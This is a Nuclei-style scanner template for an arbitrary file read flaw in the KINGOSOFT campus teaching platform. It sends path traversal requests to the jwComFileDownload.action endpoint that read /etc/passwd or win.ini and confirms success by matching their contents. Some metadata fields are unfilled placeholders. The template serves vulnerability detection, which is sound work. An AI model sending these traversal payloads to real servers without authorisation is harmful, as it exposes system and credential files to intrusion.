id: qingguo-jwComFileDownload-fileread
info:
  name: KINGOSOFT高校智慧校园教学综合服务平台 jwComFileDownload 存在任意文件读取
  author: leadlife
  severity: high
  description: 
  reference: 
    - https://vip.bdziyi.com/60390/
  classification:
    cve-id: 
  metadata:
    verified: true/false
    fofa-query: demo
    tips:
    repair:
    version:
  tags: fileread,qingguo

http:
  - method: GET
    path:
      - "{{BaseURL}}/jw/lessonchangeapply/jwComFileDownload.action?fileSavePath=../../../../../../../etc/passwd&name="
      - "{{BaseURL}}/jw/lessonchangeapply/jwComFileDownload.action?fileSavePath=../../../../../../../c:/windows/win.ini&name="

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or

      - type: status
        status:
          - 200